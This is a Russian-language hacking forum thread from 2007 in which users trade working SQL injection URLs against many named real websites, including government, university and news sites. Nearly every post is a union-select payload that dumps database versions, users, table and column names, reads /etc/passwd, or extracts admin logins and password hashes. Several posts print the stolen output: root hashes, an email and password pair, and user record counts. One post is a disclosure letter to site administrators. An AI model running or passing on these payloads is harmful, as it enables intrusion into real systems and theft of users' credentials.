http://www.hitl.washington.edu/people/papers.php?name=jksdelly'+union+select+relname,nul l,null+from+pg_class+where+relname%3C%3E'alum_pers on'+and+relname%3C%3E'alum_person_alumid_seq'+and+ relname%3C%3E'alum_position'+and+''='
http://www.northberwickuk.com/info.php?id=-1+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,25,26,27/*&catid=324&f=NorthBerwick&type=featured
http://www.kinogalerija.lv/info.php?id=-1+union+select+version(),1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16/*
http://admiral.delfi.lv/index.php?id=-48390++union+select+1,table_name,3+from+INFORMATIO N_SCHEMA.TABLES+limit+1,1/*
http://www.ability.nl/info.php?ID=-1+union+select+0,2,version()/*
htp://www.erikdevlieger.com/kunst.php?rq=list&id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6/* imcavas_erik@ws04.hosting.nl:4.1.21-log:imcavas_erikdevlieger
http://www.spcompanyspb.com/goods.php?type=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase())/*&style=5 u7821@localhost:5.0.24-Debian_1-log:u7821: цензуро =\
http://www.fenixbel.com/site.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22/* merkator_2222@v62.valuehost.ru:5.0.45-log:merkator_2222
Ded MustD!e
22.09.2007, 16:58
http://www.tolkien.it/catalogo/item.asp?ID=1+or+1=(SELECT+TOP+1+passw+from+Tadmin s+where+username='roby')--
_-Ramos-_
22.09.2007, 17:04
www.chip.ua - сайт журнала CHIP
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Скуль так розкрутить не удалось =\
P.S: _http://www.ichip.ru/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
тот же результат =)
http://www.sgbank.ru/news.asp?news_id=1+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT +IN+('bankdel','bankseek','cbr','currency_exch','c urrency_opt','currency_zayavka','doc_req','documen ts','dtproperties','forums','keybaseb','keybasef', 'messages','news1'))--
baser192:12345
BlackCats
22.09.2007, 17:56
Google Page Rank 8/10
WebAlta WTR 9/10
4-ая версия..
логин+пароль:
http://www.mnogosearch.org/bugs/bugs.php?id=-1+union+select+1,2,pass,4,5,6,7,8,9,user,11,12,13, 14,15,16+from+user/*
логин:
bar
хэш пасса:
948f878a52bb69d5e54fe8d04dcddfd5
http://www.concertseries.org/index.php?page=-1+union+select+0,1,2,3,4,version(),user(),7,8,9,10 ,11,12,13,15,17,18,19,20/*
big_BRAT
22.09.2007, 18:09
www.chip.ua - сайт журнала CHIP
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Скуль так розкрутить не удалось =\
P.S: _http://www.ichip.ru/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
тот же результат =)
___http://www.chip.ua/?page=poll&id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13+from+information_schema.tables+limit+16,1/*
BlackCats
22.09.2007, 18:23
www.chip.ua - сайт журнала CHIP
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Скуль так розкрутить не удалось =\
P.S: _http://www.ichip.ru/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
тот же результат =)
все таблички:
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13+from+INFORMATION_SCHEMA.TABLES/*
все колонки:
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11,1 2,13+from+INFOrMATION_SCHEMA.COLUMNS/*
BlackCats
22.09.2007, 18:30
http://www.northberwickuk.com/info.php?id=-1+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,25,26,27/*&catid=324&f=NorthBerwick&type=featured
пасс: test.. логина не нашёл.. предполагаю что тоже test
http://www.northberwickuk.com/info.php?id=-1+union+select+0,password,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,25,26,27+from+us er/*&catid=324&f=NorthBerwick&type=featured
http://www.sbinstitute.com/news.php?id=-1+union+select+0,concat(user,char(58),password),us er,3,4+from+mysql.user/*
root:18846f503afd5707
Второй рут за сегодня )
К сожаленью пасс расшифровать не удалось (
http://www.reporterdiario.com.br/index.php=3fid=3d-33150'+union+select+1,user(),database(),version(), 5,6,7,8,9,10,11/*
https://forum.antichat.ru/showpost.php?p=340659&postcount=1987
http://www.mnogosearch.org/bugs/bugs.php?id=21+order+by+16
9898
https://forum.antichat.ru/showpost.php?p=465643&postcount=3174
Google Page Rank 8/10
WebAlta WTR 9/10
4-ая версия..
логин+пароль:
http://www.mnogosearch.org/bugs/bugs.php?id=-1+union+select+1,2,pass,4,5,6,7,8,9,user,11,12,13, 14,15,16+from+user/*
логин:
bar
хэш пасса:
948f878a52bb69d5e54fe8d04dcddfd5
Классно, можно выкладывать раз по 10, так наверное эффективнее (репы больше и т.д.) получится?
big_BRAT
23.09.2007, 00:36
___http://kino.ukr.net/i/nw.php?t=nologo&f=&id=4897999+uNioN+seLect+concat(login,0x3a,passw),n ull,null,null,null+from+users+limit+6,1/*&mid=1345
результат в исходниках страницы
version() 5.0.18
user() afisha@10.60.20.5
database() afisha
http://www.tahuichi.com.bo/noticia.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11/*&idioma=Ingles tahuichi@hosting2.cotas.com.bo:5.0.27:dbtahuichi
http://www.iglesia.org.bo/sitio/comisiones/comisionbase.php?id=9999+union+select+1,2,3,4,5,co ncat(user(),0x3a,version(),0x3a,database()),7/* iglesia_iglesia@localhost:4.1.22-standard:iglesia_ceb
[53x]Shadow
23.09.2007, 16:36
MSSQL+GOV
tms.apps.em.doe.gov
http://tms.apps.em.doe.gov/current/ost/Review/TkRvTASLi.asp?ApplicationID=-1+or+1=@@version--
http://tms.apps.em.doe.gov/current/ost/Review/TkRvTASLi.asp?ApplicationID=-1+or+1=(select+system_user)--
www.workforcekentucky.ky.gov
http://www.workforcekentucky.ky.gov/cgi/dataanalysis/cesReport.asp?tableName=CES&dataColumns=earnings%2C+empces%2C+hourearn%2C+hour s%2C+empprodwrk&ID=-1+or+1=@@version--
http://www.workforcekentucky.ky.gov/cgi/dataanalysis/cesReport.asp?tableName=CES&dataColumns=earnings%2C+empces%2C+hourearn%2C+hour s%2C+empprodwrk&ID=-1+or+1=(select+system_user)--
www3.fmc.gov
http://www3.fmc.gov/btaagmnts/amend_func2_npage.asp?agmtnum=-1'+or+1=@@version--
http://www3.fmc.gov/btaagmnts/amend_func2_npage.asp?agmtnum=123'+union+select+1, system_user,3,4--
кому интересно дальше ройте...
http://www.captains-club.ru/index.php?id=110%20union%20select%201,2,COLUMN_NAM E,4,5,6,7,8,9,10%20from%20INFORMATION_SCHEMA.COLUM NS/*
http://www.captains-club.ru/index.php?id=110%20union%20select%201,2,TABLE_NAME ,4,5,6,7,8,9,10%20from%20INFORMATION_SCHEMA.TABLES/*
http://www.avvakul.ru/index.php?id=2&p=6&tid=60%20union%20select%201,TABLE_NAME,3,4,5%20fro m%20INFORMATION_SCHEMA.TABLES/*
http://www.avvakul.ru/index.php?id=2&p=6&tid=60%20union%20select%201,COLUMN_NAME,3,4,5%20fr om%20INFORMATION_SCHEMA.COLUMNS/*
http://www.vipsoft.by/index.php?id=200%20union%20select%201,TABLE_NAME,3 %20from%20INFORMATION_SCHEMA.TABLES/*
http://www.vipsoft.by/index.php?id=200%20union%20select%201,COLUMN_NAME, 3%20from%20INFORMATION_SCHEMA.COLUMNS/*
интересная скуля
код:
http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,concat_ws(0x3a,table_name,colu mn_name),4+from+information_schema.columns/*
жаль незнаю как добиться вывода инфы,на все запросы к бд выдает такую ошибку :
1146 - Table 'webtelek_com.xxx_xxx' doesn't exist
select image_url, display_name, description, pvr_status from channel where connectv_id is not null and products_id = '-0' union select 1,2,concat_ws
(0x3a,clientname,clientpassword),4 from phpads_clients/*' and (pvr_status IS NULL OR pvr_status='N' OR pvr_status <> 'X') order by rank
[TEP STOP]
разъясните ламеру,кому не лень :)
спасибо [53X]Shadowкод:
http://www.webtelek.com/includes/products_view.php?pid=-0+'union+select+1,2,concat_ws(0x3a,username,user_p assword,user_icq,user_email),4+from+phpbb.phpbb_us ers/*
[53x]Shadow
23.09.2007, 17:38
интересная скуля
код:
http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,concat_ws(0x3a,table_name,colu mn_name),4+from+information_schema.columns/*
жаль незнаю как добиться вывода инфы,на все запросы к бд выдает такую ошибку :
1146 - Table 'webtelek_com.xxx_xxx' doesn't exist
select image_url, display_name, description, pvr_status from channel where connectv_id is not null and products_id = '-0' union select 1,2,concat_ws
(0x3a,clientname,clientpassword),4 from phpads_clients/*' and (pvr_status IS NULL OR pvr_status='N' OR pvr_status <> 'X') order by rank
[TEP STOP]
разъясните ламеру,кому не лень :)
Ты не ту схему(базу данных юзаешь) для phpads_clients
сначала выясняем имя бд вот так
http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,table_schema,4+from+informatio n_schema.tables+where+table_name='phpads_clients'/*
а затем через точку делаем запрос к нужной таблице
http://www.webtelek.com/includes/products_view.php?pid=-0%20'union%20select%201,2,concat_ws(0x3a,clientnam e,clientpassword),4%20from%20phpads.phpads_clients/*
подробнее здесь:
https://forum.antichat.ru/showpost.php?p=442627&postcount=26
Constantine
23.09.2007, 17:44
[53x]Shadow,fobofob в таблице phpds_clients ничего интересного не найдете. По умолчанию в таблице phpads_config содержаться логины и мд5 хеши паролей админов, колонки admin,admin _pw
[53x]Shadow
23.09.2007, 17:50
[53x]Shadow,fobofob в таблице phpds_clients ничего интересного не найдете. По умолчанию в таблице phpads_config содержаться логины и мд5 хеши паролей админов, колонки admin,admin _pw
Хм.. я в принципе там ничего и не искал, просто объяснил человеку где ошибка, но в принципе в phpads_config только имя и хеш админа, а в phpads_clients дофига разных хешей =)
http://www.groza.ru/index.php?m=servers&a=view&sid=-2+union+select+1,version(),3,4,5/*&id=0
http://www.ceidot.com/adres.php?id=-11+union+select+1,user(),3/*
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,5,6,7,8,1,1,1/*
http://www.g-h.co.uk/links.php?page=-1+union+select+0,1,2,3,4,5,6,7,load_file(0x2F65746 32F706173737764),9,10,11/*
/etc/passwd
http://www.g-h.co.uk/links.php?page=-1+union+select+0,1,2,3,4,5,6,7,concat(user,char(58 ),password),9,10,11+from+mysql.user/*
Очередной рут )
root:3facb56d34db5a20
http://www.ps3tag.com/formProcess.asp?doForm=5&step=
inlanger
24.09.2007, 12:26
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,5,6,7,8,1,1,1/*
выводим юзера и пасс:
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,user,password,6,7,8,1,1,1+f rom+mysql.user/*
yroot
31a457464200908a
Это первая удачная скуля, которой я сумел воспользоваться, и понял, как они работают! Спасибо всем за это!
http://www.missiontech.co.nz/read_a_article.php?id=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,ve rsion(),0x3a,database())/* toms@localhost:5.0.41:MT_ArticlesDB
http://www.gicom.co.mz/index.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7,8,9/* gicomco@localhost:4.1.22-standard:gicomco_site
http://farm.avocadolite.com/member.phtml?id=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(v ersion(),0x71),0x71),7,8/* 4.1.16-standard-log
http://www.ollin.com.mx/news_esp.php?id=-1+union+select+1,2,3,4,concat(nombre,0x3a,password ,0x3a,email),6,7,8+from+usuarios/* Joe:4050:joel@ollin.com.mx
http://www.a.com.mx/noticia.php?id=-1+union+select+1,user(),3,4,database(),6,7,8,versi on()/*
http://www.midiasemmascara.com.br/editoria.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2/* midiasemmascara@200.234.200.116:5.0.41--log:midiasemmascara http://www.midiasemmascara.com.br/editoria.php?id=-1+union+select+1,concat(login,0x3a,usuario)+from+d b_admusers+limit+2,1/*
http://www.visitadopapa.org.br/pagina.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3/* papst2007@localhost:4.0.24_Debian-10sarge2-log:visitapapa http://www.visitadopapa.org.br/pagina.php?id=-1+union+select+1,user,password+from+mysql.user/* root:706ae7350f1aa0d5
http://www.temporeal.com.br/produtos.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,versio n(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* temporeal@10.10.10.2:4.0.21-standard-log:temporeal
http://www.araucodobrasil.com.br/page.php?id=-1+union+select+1,concat(name,0x3a,login,0x3a,passw ord,0x3a,type)+from+aglomerado_users+limit+19000/*
http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VER SION(),0x71),0x71),6,7/*&tipo=episodio&origem=Assista http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(USE R,0x71),0x71),6,7+from+mysql.user/*&tipo=episodio&origem=Assista http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,LOAD_FILE(char(47,101,116,9 9,47,112,97,115,115,119,100)),6,7/*&tipo=episodio&origem=Assista
http://teatroficina.uol.com.br/noticias.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,vers ion(),0x3a,database()),8,9,10,11,12,13/* http://teatroficina.uol.com.br/noticias.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(column_name, 0x3a,table_name),10,11,12,13+from+INFORMATION_SCHE MA.COLUMNS+limit+178,1/*
http://www.rockwm.de/songdetail.php?id=-1+union+select+1,2,3,4,5,6,LOAD_FILE(char(47,101,1 16,99,47,112,97,115,115,119,100)),8,9,10,11,12/* http://www.prrn.mpf.gov.br/noticia.php?id=-1/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3a,database()), 4,5,6/* intranet@200.142.13.133:5.0.22-Debian_0ubuntu6.06.2-log:intranet
http://www.prrn.mpf.gov.br/noticia.php?id=-1/**/ union/**/select/**/1,user,password,4 ,5,6+from+mysql.user+limit+1,2/* root:4cd8bb5521e9721c
лимитом до 6,2
http://www.prrn.mpf.gov.br/noticia.php?id=-1/** / union/**/select/**/1,2,concat(column_name,0x3a,table_name,0x3a),4,5,6 +from+INFORMATION_SCHEMA.COLUMNS+limit+159,1/*
Termin@L
24.09.2007, 19:42
http://www.themetalcircus.com/noticiadia.php?id=-1+union+select+1,login_name,3,4,5,6,7,8,9,10,11,12 ,13,14+loginform/*
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-1+union+select+user(),2+from+login/*
PR=8/10
http://www.gametrailers.com/gamepage.php?id=-1+union+select+1,2,3,user(),5,6,7,8,9,10,11,databa se(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29/*
PR=5/10
http://www.michaelpollan.com/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+articles/*
http://michaelyoun.com/index.php?id=336+union+select+1,concat(login,char( 58),pass),3,4,5,6+from+users/*
ЧТО ЭТО? (последняя)
Интернет провайдер
http://trytek.ru/tarifs.php?go=chasn&act=view&id='
http://trytek.ru/tarifs.php?go=chasn&act=view&id='%20union%20select%201,2,3,4,5,6,7,8,9,10/*
http://trytek.ru/tarifs.php?go=chasn&act=view&id='%20union%20select%201,concat(column_name,0x3a, table_name,0x3a),3,4,5,6,7,8,9,10%20from%20INFORMA TION_SCHEMA.COLUMNS%20limit%201,1/*
Дальше сами )
http://www.smother.net/reviews/hiphop.php?ID=-12+UNION+select+1,2,username,4,password,6,email,ho mepage,9,10,11,12+from+users+limit+301,1
"/
http://www.crystalmoby.com/shop.php?id=-15+union+select+1,2,3,4,5,6,7/*
http://www.do4money.com/directory.php?ax=list&sub=7&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10, 11,12,13/**/FROM/**/admin/*
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,table_n ame,4,5,6,7,8,9,10,11,12,13,14+from+information_sc hema.tables/*
BlackCats
25.09.2007, 21:51
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,table_n ame,4,5,6,7,8,9,10,11,12,13,14+from+information_sc hema.tables/*
раскрутил:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,table_n ame,4,5,6,7,8,9,10,11,12,13,14+from+information_sc hema.tables+limit+66,1/*
такбличка юзерс.
колумны:
username:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,column_ name,4,5,6,7,8,9,10,11,12,13,14+from+INFOrMATION_S CHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+9,1/*
pword:
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,column_ name,4,5,6,7,8,9,10,11,12,13,14+from+INFOrMATION_S CHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+10,1/*
вывод:... только почемуто пусто... мб ни 1 юзера?
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,pword,use rname,4,5,6,7,8,9,10,11,12,13,14+from+users/*
вывод:... только почемуто пусто... мб ни 1 юзера?
http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,pword,use rname,4,5,6,7,8,9,10,11,12,13,14+from+users/*
Пусто у тебя в голове))
http://www.tea.co.uk/index.php?pgId=11111111111111111+union+select+1,co ncat(username,char(58),pword),5,4,5,6,7,8,9,10,11, 12,13,14+from+users+where+length(username)>=1+limit+0,1/*
Получаем:
faridah94@hotmail.com:faridah94@hotmail.com
и т.д. записей много:
http://www.tea.co.uk/index.php?pgId=11111111111111111+union+select+1,co unt(concat(username,char(58),pword)),5,4,5,6,7,8,9 ,10,11,12,13,14+from+users+where+length(username)>=1+limit+0,1/*
Записей: 7461
Объяснял новечку скули и случайно наткнулся на .edu :
http://www.antioch-college.edu/news/releases/index.php?id=-178%20UNION%20SELECT%201,2,user(),version(),databa se(),6,7,8,9,10,11,12/*
otdohni.ws
код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat(table_name,0x3a,column _name),3,4,5+from+information_schema.columns/*
код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,user_password, user_name,user_loginname,user_email),3,4,5+from+de nisvd_db01.e107_user/*
код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,ID_MEMBER,real Name,memberName,memberIP,memberIP2,MSN,emailAddres s,hideEmail,YIM,AIM,ICQ,passwd,passwordSalt),%27CR ACKed%20by%20fobofob%27,4,5+from+doctor_forum.back up_smf_members+limit+115,1/*
а вот тут не понял что за странность с лимитом
код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,user_id,userna me,password,email),3,4,5+from+doctor_almi.av_users/*
дальше не рыл...
http://www.themetalcircus.com/noticiadia.php?id=-1+union+select+1,login_name,3,4,5,6,7,8,9,10,11,12 ,13,14+loginform/*
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-1+union+select+user(),2+from+login/*
PR=8/10
http://www.gametrailers.com/gamepage.php?id=-1+union+select+1,2,3,user(),5,6,7,8,9,10,11,databa se(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29/*
PR=5/10
http://www.michaelpollan.com/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+articles/*
http://michaelyoun.com/index.php?id=336+union+select+1,concat(login,char( 58),pass),3,4,5,6+from+users/*
ЧТО ЭТО? (последняя)
Если не ошибаюсь, то солёный хэш.
а вот тут не понял что за странность с лимитом
код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,user_id,userna me,password,email),3,4,5+from+doctor_almi.av_users /*
пользуй тогда не лимит, а where
http://stepbystep.htmlbook.ru/?id=24+UNION+SELECT+1,2,3/*
Смотрим в самый низ, там где каменты, там наше "блюдо"
Версия 4 какие могут быть имена таблиц на HTML мануале, незнаю...
http://www.edipi.com/guidasw/aziende.php?nzl=N&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t(user(),0x3a,version(),0x3a,database()),15,16,17, 18 ,19/* edipi_com25466@wnx-10.seeweb.it:4.0.24_Debian-10sarge1:edipi_com25466
http://wwwdoska.ru/idv.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a, version(),0x3a,database()),10,11,12,13,14,15,16,1 7,18,19,20/* wwwdoska_new@localhost:4.1.22-standard:wwwdoska_new
http://www.isis.or.ug/news.php?p=5&id=99999+union+select+1,concat(user(),0x3a,version (),0x3a,database( )),3,4,5,6,7,8,9/* isis@localhost:4.1.20:isis
http://ss.mak.ac.ug/index.php?act=news&full=true&id=9999+union+select+concat(user(),0x3a,version( ),0x3a,database()),2/* maktus1_ss@localhost:4.1.22-standard:maktus1_ss
http://www.unbs.go.ug/news.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2,3,4/* unbsdbadmin@localhost:4.1.21:unbs_go_ug
http://www.nic.co.ug/pg.php?p=media&s=news&Id=9999+union+select+1,2,3,concat(user(),0x3a,vers ion(),0x3a,database()),5/* niccou_niccou@localhost:4.1.22-standard:niccou_
http://poderedomex.com/notas.asp?nota_id=1+and+1=convert(int,@@version)--
http://www.yard-saler.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
http://www.e商店.com/en/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
http://www.adsjax.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
http://www.imadspace.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
http://racecarbroker.net/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
halkfild
27.09.2007, 02:52
Письмо админам ресурса.. было отправлено более недели назад
Здравствуйте, уважаемые!
Довожу до Вашего сведения, что в вашем движке, которому соответствет URL
job.i-files.org, мною обнаружена уязвимость класса SQL-Injection,
позволяющая выполнить произвольный SQL-запрос в базе данных приложения с правами соответствующего пользователя. Пример уязвимости:
1)
http://job.i-files.org/?do=details&id=-448601+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat_ws(0x3A,%20version(),%20user(),%20databa se()),16,17,18,19,20,21,22,23,24/*'&q=%F3&vac=1&razd=0&city=0&photo=0&salary=0&fmt=2¤cy=0&last_s_id=0
'
5.0.32-Debian_7etch1-log:job@mail.101.com.ua:job
2)
http://job.i-files.org/?do=details&id=-448601+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat_ws(0x3A,table_name,table_schema),16,17,1 8,19,20,21,22,23,24+from+information_schema.tables +where+table_name+like+'%25user%25'/*'&q=%F3&vac=1&razd=0&city=0&photo=0&salary=0&fmt=2¤cy=0&last_s_id=0
'
ну и так далее)
Прощу принять во внимание предоставленную информацию, и принять меры к
устранению уязвимости пока это не привело к плачевным результатам.
з.ы. админы уведомлены
http://www.translation.net/kb/index.php?ToDo=browse&catId=-10+union+select+1,2,3,4,5,6,7/*
http://bpm.cult.bg/medusa/logs/?id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2/*bpmsIt3@localhost:4.1.22-log:bpmSite
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2,3,4,5,6/*eunews@localhost:5.0.41-Debian_1-log:eunews
http://www.humboldt.org.ni/publicaciones.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database())/*humboldt_admin@localhost:4.1.22-standard:humboldt_cms
http://www.sandra-kuehn.de/aquarium/pics.php?id=9999+union+select+1,2,3,4,aes_decrypt( aes_encrypt(version(),0x71),0x71)/*
http://www.apotheose.net/pics.php?id=-1+union+select+1,2,3,4,concat(user(),0x3a,version( ),0x3a,database())/* user09710@web04:4.1.20-log:db0971002
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database() ),5,6/* ipetra_ru@localhost:5.0.32-Debian_7etch1-log:ipetra_ru
http://www.stchristopherclub.com/sub/pics.php?id=-1+union+select+1,concat(user,0x3a,password),3,4+fr om+mysql.user/*
http://www.sws-yachts.com/pics.php?pagina=fotoboatyard&Id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6/* sws-yachts@localhost:4.1.20:sws-yachts
BlackCats
27.09.2007, 22:52
http://bpm.cult.bg/medusa/logs/?id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2/*
аськи:
http://bpm.cult.bg/medusa/logs/?id=-1+union+select+icq,2+from+users/*
логинов с пассами ненашёл :(
тотже сайт, но скуля в др месте, циферок бобольше :))
версия таже, таблы теже ..
http://bpm.cult.bg/users/profile.php?uid=-774+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24+from+users/*
Termin@L
27.09.2007, 22:54
root:*2EFC34FE6B4EFAE9BA1829EE7E8E300FB346E61C
http://www.nea.gov/honors/heritage/fellows/fellow.php?id=1983_0'+union+select+1,AES_DECRYPT(A ES_ENCRYPT(user(),0x17),0x17),3,4,5,6,7,8,9,10,11, 12,13,14,15+from+mysql.user/*
http://www.lanl.gov/opportunities/techtransfer/dsp_technology.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
BlackCats
28.09.2007, 01:21
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2,3,4,5,6/*
1)находим табличку:
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+table_name,2,3,4,5,6+from+INFORMATI ON_SCHEMA.TABLES+limit+17,1/*
2)сделаем через жопу, т.к. вначале ошиблись)
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+COLUMN_NAME,Table_name,3,4,5,6+from +INFORMATION_SCHEMA.COLUMNS+limit+179,1
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+COLUMN_NAME,Table_name,3,4,5,6+from +INFORMATION_SCHEMA.COLUMNS+limit+178,1
3)выводим.
логин:
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+alias,2,3,4,5,6+from+administrators/*
пасс:
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+password,2,3,4,5,6+from+administrat ors/*
Constantine
28.09.2007, 01:28
находим колонки.where запрещено, поэтому так:
В 5 ветке подзапросы запрещены?.. Это к разговору о знаниях. Спокойно выборку по ключевым колонкам можно сделать
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+table_name,2,3,4,5,6+from+INFORMATI ON_SCHEMA.columns++where+column_name=0x70617373776 F7264/*
и вот она твоя administrators...
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+column_name,2,3,4,5,6+from+INFORMAT ION_SCHEMA.columns++where+table_name=0x61646D696E6 973747261746F7273/*
и таблы в ней
BlackCats
28.09.2007, 15:35
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database() ),5,6/*
нашли табличку: inside_users
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,table_name,5,6+from+INFORMATION_SCHEMA.TABLE S+limit+42,1/*
колумны:
login
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.colu mns+where+table_name=0x696e736964655f7573657273+li mit+4,1/*
pwd
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.colu mns+where+table_name=0x696e736964655f7573657273+li mit+5,1/*
fio
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.colu mns+where+table_name=0x696e736964655f7573657273+li mit+6,1/*
email
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.colu mns+where+table_name=0x696e736964655f7573657273+li mit+7,1/*
icq
